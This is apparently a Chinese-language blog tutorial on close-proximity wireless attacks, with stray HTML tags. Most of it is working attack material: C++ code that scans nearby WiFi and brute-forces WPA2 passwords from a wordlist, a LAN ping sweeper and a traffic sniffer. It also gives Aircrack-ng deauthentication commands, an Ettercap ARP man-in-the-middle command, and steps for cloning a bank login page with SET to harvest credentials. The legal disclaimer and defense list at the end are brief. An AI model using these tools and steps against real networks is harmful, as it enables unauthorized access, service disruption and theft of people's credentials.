近源攻击技术详解：WiFi破解与钓鱼攻击<\/h1>

背景介绍<\/h2>

ARP攻击（Address Resolution Protocol Spoofing）<\/h3>

ARP（地址解析协议）是一种在局域网中用于将IP地址映射到MAC地址的协议。在网络中，设备通过广播ARP请求来获取目标IP地址对应的MAC地址，以便正确地发送数据包。<\/p>

ARP攻击的原理<\/strong>：
ARP攻击（又称ARP欺骗）是通过伪造ARP包，将恶意设备的MAC地址绑定到目标IP地址上，导致目标设备将数据包错误地发送给攻击者，而不是发送到实际的目标设备。<\/p>

ARP攻击的过程<\/strong>：<\/p>

攻击者向网络中发送伪造的ARP响应包，声称自己是某个设备（如网关或其他主机）的MAC地址的所有者。<\/li>
受害者的设备接收到这个伪造的ARP响应后，会将攻击者的MAC地址与目标设备的IP地址绑定。<\/li>
受害者的设备会将原本要发送给目标设备的数据包误发送给攻击者。<\/li>
攻击者可以选择将数据包转发给正确的目标设备（作为中间人攻击），或者直接拦截、篡改、窃取数据。<\/li> <\/ol>
近源钓鱼（Proximity Phishing）<\/h3>
近源钓鱼是一种通过伪装成合法目标的方式，诱使用户透露敏感信息的攻击。与传统的网络钓鱼攻击（如通过电子邮件进行）不同，近源钓鱼更侧重于物理接近性，通常发生在物理网络环境中。<\/p>
近源钓鱼的原理<\/strong>：
近源钓鱼攻击通过模拟合法的网络服务或设备，诱使用户在与攻击者设备相近的环境中提交敏感信息。攻击者通常使用Wi-Fi、蓝牙等无线技术，伪造合法的网络服务或设备，欺骗用户连接到攻击者的伪造设备或网络，进而窃取用户的认证信息或其他敏感数据。<\/p>
近源钓鱼的常见方式<\/strong>：<\/p>

伪造Wi-Fi热点（Evil Twin Attack）：攻击者设置一个与真实公共Wi-Fi网络同名的伪造Wi-Fi热点，用户连接到这个恶意热点后，攻击者可以监控用户的网络活动，窃取用户提交的敏感信息。<\/li>
蓝牙钓鱼：攻击者通过伪造蓝牙设备或服务吸引目标设备连接，然后通过篡改数据或直接窃取设备信息进行攻击。<\/li>
USB钓鱼：攻击者通过在公共场所放置恶意USB设备，诱使目标设备用户连接。这些USB设备通常包含恶意软件，一旦插入设备，攻击者便能够获得目标设备的敏感信息。<\/li> <\/ol>
环境准备<\/h2>
你可能需要以下工具：<\/p>

Aircrack-ng<\/li>
Npcap<\/li>
Ettercap<\/li>
Social-Engineer Toolkit (SET)<\/li> <\/ul>
技术实现步骤<\/h2>
T1：获取附近WiFi信息<\/h3>
#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <wlanapi.h><\/span> <\/span><\/span><\/span>#include<\/span> <objbase.h><\/span> <\/span><\/span><\/span>#include<\/span> <wtypes.h><\/span> <\/span><\/span><\/span>#include<\/span> <iostream><\/span> <\/span><\/span><\/span>#include<\/span> <vector><\/span> <\/span><\/span><\/span>#include<\/span> <string><\/span> <\/span><\/span><\/span>#include<\/span> <sstream><\/span> <\/span><\/span><\/span>#include<\/span> <iomanip><\/span> <\/span><\/span><\/span>#pragma comment(lib, "Wlanapi.lib") <\/span><\/span><\/span>#pragma comment(lib, "Ole32.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> PrintWiFiNetworks<\/span>() { <\/span><\/span> HANDLE clientHandle =<\/span> NULL; <\/span><\/span> DWORD version =<\/span> 2<\/span>; <\/span><\/span> DWORD negotiatedVersion =<\/span> 0<\/span>; <\/span><\/span> PWLAN_INTERFACE_INFO_LIST interfaceList =<\/span> NULL; <\/span><\/span> PWLAN_AVAILABLE_NETWORK_LIST networkList =<\/span> NULL; <\/span><\/span> <\/span><\/span> \/\/ 初始化COM库 <\/span><\/span><\/span><\/span> CoInitialize(NULL); <\/span><\/span> <\/span><\/span> \/\/ 初始化WLAN客户端 <\/span><\/span><\/span><\/span> DWORD result =<\/span> WlanOpenHandle(version, NULL, &<\/span>negotiatedVersion, &<\/span>clientHandle); <\/span><\/span> if<\/span> (result !=<\/span> ERROR_SUCCESS) { <\/span><\/span> std::<\/span>cerr <<<\/span> "无法打开WLAN句柄。错误代码: "<\/span> <<<\/span> result <<<\/span> std::<\/span>endl; <\/span><\/span> CoUninitialize(); <\/span><\/span> return<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 获取WLAN接口列表 <\/span><\/span><\/span><\/span> result =<\/span> WlanEnumInterfaces(clientHandle, NULL, &<\/span>interfaceList); <\/span><\/span> if<\/span> (result !=<\/span> ERROR_SUCCESS) { <\/span><\/span> std::<\/span>cerr <<<\/span> "无法枚举WLAN接口。错误代码: "<\/span> <<<\/span> result <<<\/span> std::<\/span>endl; <\/span><\/span> WlanCloseHandle(clientHandle, NULL); <\/span><\/span> CoUninitialize(); <\/span><\/span> return<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 遍历每个接口 <\/span><\/span><\/span><\/span> for<\/span> (DWORD i =<\/span> 0<\/span>; i <<\/span> interfaceList-><\/span>dwNumberOfItems; i++<\/span>) { <\/span><\/span> PWLAN_INTERFACE_INFO interfaceInfo =<\/span> &<\/span>interfaceList-><\/span>InterfaceInfo[i]; <\/span><\/span> <\/span><\/span> \/\/ 获取可用网络列表 <\/span><\/span><\/span><\/span> result =<\/span> WlanGetAvailableNetworkList(clientHandle, &<\/span>interfaceInfo-><\/span>InterfaceGuid, 0<\/span>, NULL, &<\/span>networkList); <\/span><\/span> if<\/span> (result !=<\/span> ERROR_SUCCESS) { <\/span><\/span> std::<\/span>cerr <<<\/span> "无法获取可用网络列表。错误代码: "<\/span> <<<\/span> result <<<\/span> std::<\/span>endl; <\/span><\/span> continue<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 打印可用网络列表 <\/span><\/span><\/span><\/span> for<\/span> (DWORD j =<\/span> 0<\/span>; j <<\/span> networkList-><\/span>dwNumberOfItems; j++<\/span>) { <\/span><\/span> PWLAN_AVAILABLE_NETWORK network =<\/span> &<\/span>networkList-><\/span>Network[j]; <\/span><\/span> <\/span><\/span> \/\/ 打印SSID <\/span><\/span><\/span><\/span> std::<\/span>cout <<<\/span> "SSID: "<\/span>; <\/span><\/span> for<\/span> (DWORD k =<\/span> 0<\/span>; k <<\/span> network-><\/span>dot11Ssid.uSSIDLength; k++<\/span>) { <\/span><\/span> std::<\/span>cout <<<\/span> network-><\/span>dot11Ssid.ucSSID[k]; <\/span><\/span> } <\/span><\/span> std::<\/span>cout <<<\/span> std::<\/span>endl; <\/span><\/span> <\/span><\/span> \/\/ 打印安全协议 <\/span><\/span><\/span><\/span> std::<\/span>cout <<<\/span> "安全协议: "<\/span>; <\/span><\/span> switch<\/span> (network-><\/span>dot11DefaultAuthAlgorithm) { <\/span><\/span> case<\/span> DOT11_AUTH_ALGO_RSNA_PSK: <\/span><\/span> std::<\/span>cout <<<\/span> "WPA2-PSK"<\/span>; <\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> DOT11_AUTH_ALGO_WPA_PSK: <\/span><\/span> std::<\/span>cout <<<\/span> "WPA-PSK"<\/span>; <\/span><\/span> break<\/span>; <\/span><\/span> case<\/span> DOT11_AUTH_ALGO_80211_OPEN: <\/span><\/span> std::<\/span>cout <<<\/span> "开放"<\/span>; <\/span><\/span> break<\/span>; <\/span><\/span> default<\/span>:<\/span> <\/span><\/span> std::<\/span>cout <<<\/span> "未知"<\/span>; <\/span><\/span> break<\/span>; <\/span><\/span> } <\/span><\/span> std::<\/span>cout <<<\/span> std::<\/span>endl; <\/span><\/span> <\/span><\/span> \/\/ 打印无线电类型 <\/span><\/span><\/span><\/span> std::<\/span>cout <<<\/span> "无线电类型: "<\/span>; <\/span><\/span> if<\/span> (network-><\/span>dot11BssType ==<\/span> dot11_BSS_type_infrastructure) { <\/span><\/span> std::<\/span>cout <<<\/span> "基础设施"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> if<\/span> (network-><\/span>dot11BssType ==<\/span> dot11_BSS_type_independent) { <\/span><\/span> std::<\/span>cout <<<\/span> "Ad hoc"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> { <\/span><\/span> std::<\/span>cout <<<\/span> "未知"<\/span>; <\/span><\/span> } <\/span><\/span> std::<\/span>cout <<<\/span> std::<\/span>endl; <\/span><\/span> <\/span><\/span> \/\/ 打印信号强度 <\/span><\/span><\/span><\/span> std::<\/span>cout <<<\/span> "信号强度: "<\/span> <<<\/span> network-><\/span>wlanSignalQuality <<<\/span> "%"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> <\/span><\/span> \/\/ 打印频段 <\/span><\/span><\/span><\/span> std::<\/span>cout <<<\/span> "频段: "<\/span>; <\/span><\/span> if<\/span> (network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_fhss ||<\/span> <\/span><\/span> network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_dsss ||<\/span> <\/span><\/span> network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_erp) { <\/span><\/span> std::<\/span>cout <<<\/span> "2.4GHz"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> if<\/span> (network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_ofdm) { <\/span><\/span> std::<\/span>cout <<<\/span> "2.4GHz"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> if<\/span> (network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_ht) { <\/span><\/span> std::<\/span>cout <<<\/span> "2.4GHz 或 5GHz"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> if<\/span> (network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_vht) { <\/span><\/span> std::<\/span>cout <<<\/span> "5GHz"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> if<\/span> (network-><\/span>dot11PhyTypes[0<\/span>] ==<\/span> dot11_phy_type_he) { <\/span><\/span> std::<\/span>cout <<<\/span> "2.4GHz 或 5GHz"<\/span>; <\/span><\/span> } <\/span><\/span> else<\/span> { <\/span><\/span> std::<\/span>cout <<<\/span> "未知"<\/span>; <\/span><\/span> } <\/span><\/span> std::<\/span>cout <<<\/span> std::<\/span>endl; <\/span><\/span> std::<\/span>cout <<<\/span> "---------------------------------"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 释放可用网络列表 <\/span><\/span><\/span><\/span> WlanFreeMemory(networkList); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 释放接口列表 <\/span><\/span><\/span><\/span> WlanFreeMemory(interfaceList); <\/span><\/span> <\/span><\/span> \/\/ 关闭WLAN客户端 <\/span><\/span><\/span><\/span> WlanCloseHandle(clientHandle, NULL); <\/span><\/span> <\/span><\/span> \/\/ 反初始化COM库 <\/span><\/span><\/span><\/span> CoUninitialize(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> PrintWiFiNetworks(); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>T2：WiFi密码爆破<\/h3> \/\/ 生成临时XML配置文件 <\/span><\/span><\/span><\/span>void<\/span> CreateWiFiConfig<\/span>(const<\/span> std::<\/span>string&<\/span> ssid, const<\/span> std::<\/span>string&<\/span> password, const<\/span> std::<\/span>string&<\/span> filename) { <\/span><\/span> std::<\/span>ofstream configFile(filename); <\/span><\/span> configFile <<<\/span> R"(<?xml version="<\/span>1.0<\/span>"?><\/span> <\/span><\/span><<\/span>WLANProfile xmlns=<\/span>"http:\/\/www.microsoft.com\/networking\/WLAN\/profile\/v1"<\/span>><\/span> <\/span><\/span> <<\/span>name><\/span>)" << ssid << R"<\/span>(<\/<\/span>name><\/span> <\/span><\/span> <<\/span>SSIDConfig><\/span> <\/span><\/span> <<\/span>SSID><\/span> <\/span><\/span> <<\/span>name><\/span>)" << ssid << R"<\/span>(<\/<\/span>name><\/span> <\/span><\/span> <\/<\/span>SSID><\/span> <\/span><\/span> <\/<\/span>SSIDConfig><\/span> <\/span><\/span> <<\/span>connectionType><\/span>ESS<\/<\/span>connectionType><\/span> <\/span><\/span> <<\/span>connectionMode><\/span>auto<\/span><\/<\/span>connectionMode><\/span> <\/span><\/span> <<\/span>MSM><\/span> <\/span><\/span> <<\/span>security><\/span> <\/span><\/span> <<\/span>authEncryption><\/span> <\/span><\/span> <<\/span>authentication><\/span>WPA2PSK<\/<\/span>authentication><\/span> <\/span><\/span> <<\/span>encryption><\/span>AES<\/<\/span>encryption><\/span> <\/span><\/span> <<\/span>useOneX><\/span>false<\/<\/span>useOneX><\/span> <\/span><\/span> <\/<\/span>authEncryption><\/span> <\/span><\/span> <<\/span>sharedKey><\/span> <\/span><\/span> <<\/span>keyType><\/span>passPhrase<\/<\/span>keyType><\/span> <\/span><\/span> <<\/span>protected<\/span>><\/span>false<\/<\/span>protected<\/span>><\/span> <\/span><\/span> <<\/span>keyMaterial><\/span>)" << password << R"<\/span>(<\/<\/span>keyMaterial><\/span> <\/span><\/span> <\/<\/span>sharedKey><\/span> <\/span><\/span> <\/<\/span>security><\/span> <\/span><\/span> <\/<\/span>MSM><\/span> <\/span><\/span><\/<\/span>WLANProfile><\/span>)";<\/span> <\/span><\/span> configFile.close(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 检查网络连通性 <\/span><\/span><\/span><\/span>bool<\/span> CanPingBaidu<\/span>() { <\/span><\/span> return<\/span> system("ping www.baidu.com -n 1 > nul 2>&1"<\/span>) ==<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 尝试连接WiFi <\/span><\/span><\/span><\/span>bool<\/span> TryConnectToWiFi<\/span>(const<\/span> std::<\/span>string&<\/span> ssid, const<\/span> std::<\/span>string&<\/span> password) { <\/span><\/span> \/\/ 清除旧配置 <\/span><\/span><\/span><\/span> std::<\/span>string deleteCmd =<\/span> "netsh wlan delete profile name=<\/span>\"<\/span>"<\/span> +<\/span> ssid +<\/span> "<\/span>\"<\/span>"<\/span>; <\/span><\/span> system(deleteCmd.c_str()); <\/span><\/span> <\/span><\/span> \/\/ 生成新配置文件 <\/span><\/span><\/span><\/span> CreateWiFiConfig(ssid, password, "wifi_profile.xml"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 添加配置文件 <\/span><\/span><\/span><\/span> system("netsh wlan add profile filename=<\/span>\"<\/span>wifi_profile.xml<\/span>\"<\/span>"<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 尝试连接 <\/span><\/span><\/span><\/span> std::<\/span>string connectCmd =<\/span> "netsh wlan connect name=<\/span>\"<\/span>"<\/span> +<\/span> ssid +<\/span> "<\/span>\"<\/span>"<\/span>; <\/span><\/span> system(connectCmd.c_str()); <\/span><\/span> <\/span><\/span> \/\/ 等待连接稳定 <\/span><\/span><\/span><\/span> Sleep(2000<\/span>); <\/span><\/span> <\/span><\/span> \/\/ 检查网络连通性 <\/span><\/span><\/span><\/span> return<\/span> CanPingBaidu(); <\/span><\/span>} <\/span><\/span> <\/span><\/span>\/\/ 从字典中爆破密码 <\/span><\/span><\/span><\/span>std::<\/span>string BruteForceWiFi(const<\/span> std::<\/span>string&<\/span> ssid, const<\/span> std::<\/span>string&<\/span> dictionaryFile) { <\/span><\/span> std::<\/span>ifstream file(dictionaryFile); <\/span><\/span> std::<\/span>string password; <\/span><\/span> <\/span><\/span> while<\/span> (std::<\/span>getline(file, password)) { <\/span><\/span> std::<\/span>cout <<<\/span> "尝试密码: "<\/span> <<<\/span> password <<<\/span> std::<\/span>endl; <\/span><\/span> if<\/span> (TryConnectToWiFi(ssid, password)) { <\/span><\/span> return<\/span> password; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> return<\/span> ""<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> std::<\/span>string ssid =<\/span> "目标WiFi名称"<\/span>; <\/span><\/span> std::<\/span>string dictionaryFile =<\/span> "passwords.txt"<\/span>; <\/span><\/span> <\/span><\/span> std::<\/span>string password =<\/span> BruteForceWiFi(ssid, dictionaryFile); <\/span><\/span> if<\/span> (!<\/span>password.empty()) { <\/span><\/span> std::<\/span>cout <<<\/span> "成功连接! 密码是: "<\/span> <<<\/span> password <<<\/span> std::<\/span>endl; <\/span><\/span> } else<\/span> { <\/span><\/span> std::<\/span>cout <<<\/span> "未找到正确密码。"<\/span> <<<\/span> std::<\/span>endl; <\/span><\/span> } <\/span><\/span> <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>T3：获取内网信息（可选）<\/h3> \/\/ NetworkScanner.h <\/span><\/span><\/span><\/span>#pragma once <\/span><\/span><\/span>#include<\/span> <iostream><\/span> <\/span><\/span><\/span>#include<\/span> <vector><\/span> <\/span><\/span><\/span>#include<\/span> <string><\/span> <\/span><\/span><\/span>#include<\/span> <thread><\/span> <\/span><\/span><\/span>#include<\/span> <future><\/span> <\/span><\/span><\/span>#include<\/span> <mutex><\/span> <\/span><\/span><\/span>#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <CommCtrl.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "Comctl32.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>std::<\/span>vector<<\/span>std::<\/span>string><\/span> activeIPs; <\/span><\/span>std::<\/span>mutex mtx; <\/span><\/span> <\/span><\/span>bool<\/span> IsHostActive<\/span>(const<\/span> std::<\/span>string&<\/span> ip) { <\/span><\/span> std::<\/span>string command =<\/span> "ping "<\/span> +<\/span> ip +<\/span> " -n 1 -w 100 > nul"<\/span>; <\/span><\/span> return<\/span> system(command.c_str()) ==<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span> <\/span><\/span>std::<\/span>vector<<\/span>std::<\/span>string><\/span> ScanLocalNetworkMultithreaded(HWND hwndProgress) { <\/span><\/span> std::<\/span>vector<<\/span>std::<\/span>string><\/span> result; <\/span><\/span> std::<\/span>vector<<\/span>std::<\/span>future<<\/span>void<\/span>>><\/span> futures; <\/span><\/span> <\/span><\/span> for<\/span> (int<\/span> i =<\/span> 1<\/span>; i <=<\/span> 254<\/span>; ++<\/span>i) { <\/span><\/span> std::<\/span>string ip =<\/span> "192.168.1."<\/span> +<\/span> std::<\/span>to_string(i); <\/span><\/span> <\/span><\/span> futures.push_back(std::<\/span>async(std::<\/span>launch::<\/span>async, [ip, hwndProgress]() { <\/span><\/span> if<\/span> (IsHostActive(ip)) { <\/span><\/span> std::<\/span>lock_guard<<\/span>std::<\/span>mutex><\/span> lock(mtx); <\/span><\/span> activeIPs.push_back(ip); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 更新进度条 <\/span><\/span><\/span><\/span> static<\/span> std::<\/span>atomic<<\/span>int<\/span>><\/span> progress(0<\/span>); <\/span><\/span> int<\/span> current =<\/span> ++<\/span>progress; <\/span><\/span> SendMessage(hwndProgress, PBM_SETPOS, (current *<\/span> 100<\/span>) \/<\/span> 254<\/span>, 0<\/span>); <\/span><\/span> })); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 等待所有线程完成 <\/span><\/span><\/span><\/span> for<\/span> (auto<\/span>&<\/span> f : futures) { <\/span><\/span> f.wait(); <\/span><\/span> } <\/span><\/span> <\/span><\/span> return<\/span> activeIPs; <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> ShowHostInfo<\/span>(HWND hwnd) { <\/span><\/span> \/\/ 创建进度条窗口 <\/span><\/span><\/span><\/span> HWND hwndProgress =<\/span> CreateWindowEx(0<\/span>, PROGRESS_CLASS, NULL, <\/span><\/span> WS_CHILD |<\/span> WS_VISIBLE |<\/span> PBS_SMOOTH, <\/span><\/span> 10<\/span>, 10<\/span>, 280<\/span>, 20<\/span>, hwnd, NULL, NULL, NULL); <\/span><\/span> <\/span><\/span> \/\/ 扫描网络 <\/span><\/span><\/span><\/span> auto<\/span> hosts =<\/span> ScanLocalNetworkMultithreaded(hwndProgress); <\/span><\/span> <\/span><\/span> \/\/ 关闭进度条窗口 <\/span><\/span><\/span><\/span> DestroyWindow(hwndProgress); <\/span><\/span> <\/span><\/span> \/\/ 显示结果 <\/span><\/span><\/span><\/span> std::<\/span>string message =<\/span> "发现 "<\/span> +<\/span> std::<\/span>to_string(hosts.size()) +<\/span> " 台内网主机:<\/span>\n<\/span>"<\/span>; <\/span><\/span> for<\/span> (const<\/span> auto<\/span>&<\/span> ip : hosts) { <\/span><\/span> message +=<\/span> ip +<\/span> "<\/span>\n<\/span>"<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> MessageBox(hwnd, message.c_str(), "扫描结果"<\/span>, MB_OK); <\/span><\/span>} <\/span><\/span><\/code><\/pre>T4：对原WiFi断网攻击<\/h3> 方法一：ARP攻击<\/h4> \/\/ NetworkAttack.h <\/span><\/span><\/span><\/span>#pragma once <\/span><\/span><\/span>#include<\/span> <windows.h><\/span> <\/span><\/span><\/span>#include<\/span> <iphlpapi.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span> <\/span><\/span><\/span>#pragma comment(lib, "iphlpapi.lib") <\/span><\/span><\/span>#pragma comment(lib, "ws2_32.lib") <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> DisconnectTarget<\/span>(const<\/span> std::<\/span>string&<\/span> targetIP, const<\/span> std::<\/span>string&<\/span> gatewayIP) { <\/span><\/span> \/\/ 获取目标IP的MAC地址 <\/span><\/span><\/span><\/span> ULONG macAddr[2<\/span>]; <\/span><\/span> ULONG physAddrLen =<\/span> 6<\/span>; <\/span><\/span> <\/span><\/span> DWORD dwRetVal =<\/span> SendARP(inet_addr(targetIP.c_str()), <\/span><\/span> inet_addr(gatewayIP.c_str()), <\/span><\/span> macAddr, &<\/span>physAddrLen); <\/span><\/span> <\/span><\/span> if<\/span> (dwRetVal ==<\/span> NO_ERROR) { <\/span><\/span> BYTE*<\/span> bPhysAddr =<\/span> (BYTE*<\/span>)&<\/span>macAddr; <\/span><\/span> printf("目标MAC地址: %02X-%02X-%02X-%02X-%02X-%02X<\/span>\n<\/span>"<\/span>, <\/span><\/span> bPhysAddr[0<\/span>], bPhysAddr[1<\/span>], bPhysAddr[2<\/span>], <\/span><\/span> bPhysAddr[3<\/span>], bPhysAddr[4<\/span>], bPhysAddr[5<\/span>]); <\/span><\/span> <\/span><\/span> \/\/ 持续发送伪造ARP包 <\/span><\/span><\/span><\/span> while<\/span> (true) { <\/span><\/span> \/\/ 伪造ARP响应，声称自己是网关 <\/span><\/span><\/span><\/span> \/\/ 实际应用中需要构造并发送ARP包 <\/span><\/span><\/span><\/span> printf("发送ARP欺骗包...<\/span>\n<\/span>"<\/span>); <\/span><\/span> Sleep(1000<\/span>); <\/span><\/span> } <\/span><\/span> } else<\/span> { <\/span><\/span> printf("获取MAC地址失败: %d<\/span>\n<\/span>"<\/span>, dwRetVal); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>方法二：去认证帧攻击（使用Aircrack-ng）<\/h4> 下载和安装Aircrack-ng<\/li> 安装必要的组件（WinPcap或Npcap）<\/li> 将无线网卡切换到监控模式（Linux系统下）： airmon-ng start wlan0 <\/span><\/span><\/code><\/pre><\/li> 发现目标无线网络： airodump-ng wlan0mon <\/span><\/span><\/code><\/pre><\/li> 对目标网络进行去认证帧攻击： aireplay-ng --deauth 0<\/span> -a 目标BSSID wlan0mon <\/span><\/span><\/code><\/pre>或针对特定客户端： aireplay-ng --deauth 0<\/span> -a 目标BSSID -c 客户端MAC wlan0mon <\/span><\/span><\/code><\/pre><\/li> <\/ol> T5：伪造原WiFi，迫使连接，获得信息<\/h3> 1. 开启WiFi热点<\/h4> 方法一：通过"设置"开启<\/strong><\/p> 打开"设置"（Win + I）<\/li> 进入"网络和 Internet"设置<\/li> 找到"移动热点"选项<\/li> 开启移动热点<\/li> 设置热点参数（名称和密码与原WiFi相同）<\/li> <\/ol> 方法二：通过快捷方式快速开启<\/strong><\/p> 打开快捷操作中心（Win + A）<\/li> 找到"移动热点"图标<\/li> 点击开启<\/li> <\/ol> 2. 获得内网信息<\/h4> A. 使用Npcap捕获网络流量<\/strong><\/p> #include<\/span> <pcap.h><\/span> <\/span><\/span><\/span>#include<\/span> <stdio.h><\/span> <\/span><\/span><\/span><\/span> <\/span><\/span>void<\/span> packet_handler<\/span>(u_char *<\/span>param, const<\/span> struct<\/span> pcap_pkthdr<\/span> *<\/span>header, const<\/span> u_char *<\/span>pkt_data) { <\/span><\/span> \/\/ 处理捕获的数据包 <\/span><\/span><\/span><\/span> printf("捕获到数据包，长度: %d<\/span>\n<\/span>"<\/span>, header-><\/span>len); <\/span><\/span>} <\/span><\/span> <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> pcap_t *<\/span>handle; <\/span><\/span> char<\/span> errbuf[PCAP_ERRBUF_SIZE]; <\/span><\/span> <\/span><\/span> \/\/ 打开网络接口 <\/span><\/span><\/span><\/span> handle =<\/span> pcap_open_live("eth0"<\/span>, BUFSIZ, 1<\/span>, 1000<\/span>, errbuf); <\/span><\/span> if<\/span> (handle ==<\/span> NULL) { <\/span><\/span> fprintf(stderr, "无法打开设备: %s<\/span>\n<\/span>"<\/span>, errbuf); <\/span><\/span> return<\/span> 2<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 开始捕获数据包 <\/span><\/span><\/span><\/span> pcap_loop(handle, 0<\/span>, packet_handler, NULL); <\/span><\/span> <\/span><\/span> pcap_close(handle); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>B. 分析HTTP流量提取图片URL<\/strong><\/p> \/\/ 在packet_handler中添加HTTP分析逻辑 <\/span><\/span><\/span><\/span>if<\/span> (header-><\/span>len ><\/span> 54<\/span>) { \/\/ 最小TCP\/IP头长度 <\/span><\/span><\/span><\/span> const<\/span> u_char *<\/span>payload =<\/span> pkt_data +<\/span> 54<\/span>; <\/span><\/span> int<\/span> payload_len =<\/span> header-><\/span>len -<\/span> 54<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 检查HTTP GET请求 <\/span><\/span><\/span><\/span> if<\/span> (payload_len ><\/span> 4<\/span> &&<\/span> strncmp((const<\/span> char<\/span>*<\/span>)payload, "GET "<\/span>, 4<\/span>) ==<\/span> 0<\/span>) { <\/span><\/span> printf("HTTP请求: %.*s<\/span>\n<\/span>"<\/span>, payload_len, payload); <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 检查HTTP响应中的图片URL <\/span><\/span><\/span><\/span> if<\/span> (payload_len ><\/span> 15<\/span> &&<\/span> strncmp((const<\/span> char<\/span>*<\/span>)payload, "HTTP\/1."<\/span>, 7<\/span>) ==<\/span> 0<\/span>) { <\/span><\/span> const<\/span> char<\/span> *<\/span>content_type =<\/span> strstr((const<\/span> char<\/span>*<\/span>)payload, "Content-Type: image\/"<\/span>); <\/span><\/span> if<\/span> (content_type !=<\/span> NULL) { <\/span><\/span> printf("发现图片传输<\/span>\n<\/span>"<\/span>); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>C. 使用Ettercap进行ARP欺骗<\/strong><\/p> ettercap -T -q -i eth0 -M arp:remote \/192.168.1.1\/\/ \/192.168.1.2\/\/ <\/span><\/span><\/code><\/pre>D. 伪站钓鱼（使用Social-Engineer Toolkit）<\/strong><\/p> 启动SET： .\/setoolkit <\/span><\/span><\/code><\/pre><\/li> 选择： 1) Social-Engineering Attacks 2) Website Attack Vectors 3) Credential Harvester Attack Method 4) Site Cloner <\/code><\/pre> <\/li> 输入目标URL（如银行登录页面）<\/li> 设置监听接口和端口（默认80）<\/li> <\/ol> 注意事项<\/h2> 法律合规性：这些技术仅用于合法的安全研究和渗透测试，未经授权使用可能违法。<\/li> 管理员权限：许多操作需要管理员权限才能执行。<\/li> 网络延迟：在爆破密码和网络扫描时，适当增加延迟以确保连接状态稳定。<\/li> 环境支持：部分功能（如监控模式）在Windows上可能受限，Linux系统更适用。<\/li> 目标WiFi的SSID：确保SSID输入正确，区分大小写。<\/li> <\/ol> 防御措施<\/h2> 使用强密码：避免使用简单密码，防止暴力破解。<\/li> 启用WPA3加密：比WPA2更安全。<\/li> 禁用WPS：WPS功能容易被利用。<\/li> 监控ARP表：检测ARP欺骗攻击。<\/li> 使用VPN：在公共WiFi上加密所有流量。<\/li> 验证WiFi热点：确认连接的是合法热点。<\/li> 定期检查网络：使用工具检测异常活动。<\/li> <\/ol> 总结<\/h2> 本文详细介绍了近源攻击的技术实现，包括WiFi信息收集、密码爆破、内网扫描、断网攻击和伪造热点等技术。这些技术展示了无线网络安全的脆弱性，强调了加强无线网络安全防护的重要性。安全研究人员可以使用这些技术进行合法的渗透测试和安全评估，但必须遵守法律法规和道德规范。<\/p>